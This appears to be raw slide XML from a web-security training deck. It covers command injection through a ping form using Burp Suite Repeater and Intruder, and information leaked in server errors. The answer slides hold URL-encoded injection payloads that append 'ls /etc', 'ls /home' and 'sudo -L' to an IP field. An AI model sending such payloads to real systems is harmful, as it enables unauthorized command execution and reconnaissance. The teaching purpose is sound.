            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p8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300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Launch Burp Suite. Send an IP address through the form; intercept the request; and send it to Repeater. Use Repeater and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> operator to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>List the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>List the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/home</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Print the commands you can run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo -L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p8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62" name="Google Shape;1262;p85"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2382050"/>
            <a:ext cx="9144000" cy="2524500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># List the contents of `/etc`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.8.8%20%26%20ls%20/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># List the contents of `/home`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.8.8%20%26%20ls%20/home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print the commands you can run with `sudo` (`sudo -L`)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ip=8.8.8.8%20%26sudo%20-L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Submit=submit</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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6" name="Shape 1266"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p8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Loud Pipes Review #3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1268" name="Google Shape;1268;p8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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Repeat the above exercise with Intruder, but redirect ping's output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/dev/null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>. How do the responses differ?</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1269" name="Google Shape;1269;p8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3" name="Shape 1273"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p8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Loud Pipes Review #3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1275" name="Google Shape;1275;p8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1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Repeat the above exercise with Intruder, but redirect ping's output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/dev/null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.How do the responses differ?</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1276" name="Google Shape;1276;p8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77" name="Google Shape;1277;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1767325"/>
            <a:ext cx="9144000" cy="31392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sz="1800">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
              </a:rPr>
              <a:t>The response differ in that they omit the output from ping, and only include the output of the command we chose to run. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:high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1" name="Shape 1281"/>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5" name="Shape 1285"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p89"/>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Extracting Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1287" name="Google Shape;1287;p8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1" name="Shape 1291"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p9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Extracting Errors</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1293" name="Google Shape;1293;p9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a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Servers can leak a lot of important information through errors. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1294" name="Google Shape;1294;p9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95" name="Google Shape;1295;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1339025"/>
            <a:ext cx="9144000" cy="3567300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This information includes: </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The name of directories/files you don't have read/write access to</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
